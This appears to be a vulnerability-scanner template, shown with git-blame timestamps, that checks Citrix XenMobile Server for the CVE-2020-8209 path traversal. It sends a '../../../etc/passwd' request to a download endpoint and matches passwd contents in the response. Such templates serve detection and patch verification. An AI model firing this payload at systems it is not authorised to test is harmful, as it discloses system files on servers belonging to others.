2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-8209
|
2020-11-16 14:49:51 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Citrix XenMobile Server Path Traversal
|
|
|
|
author: dwisiswant0
|
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
Improper access control in Citrix XenMobile Server 10.12 before RP2,
|
|
|
|
Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10
|
|
|
|
before RP6 and Citrix XenMobile Server before 10.9 RP5 and leads to the ability to read arbitrary files.
|
|
|
|
|
2021-08-18 11:29:20 +00:00
|
|
|
reference:
|
2020-11-16 14:49:51 +00:00
|
|
|
- https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 7.5
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2020-8209
|
|
|
|
cwe-id: CWE-22
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2020,citrix,lfi
|
2020-11-16 14:49:51 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2021-07-24 21:35:55 +00:00
|
|
|
- "root:.*:0:0:"
|
2020-11-16 14:49:51 +00:00
|
|
|
part: body
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "fileDownload=true"
|
|
|
|
- "application/octet-stream"
|
|
|
|
- "attachment;"
|
|
|
|
condition: and
|
|
|
|
part: header
|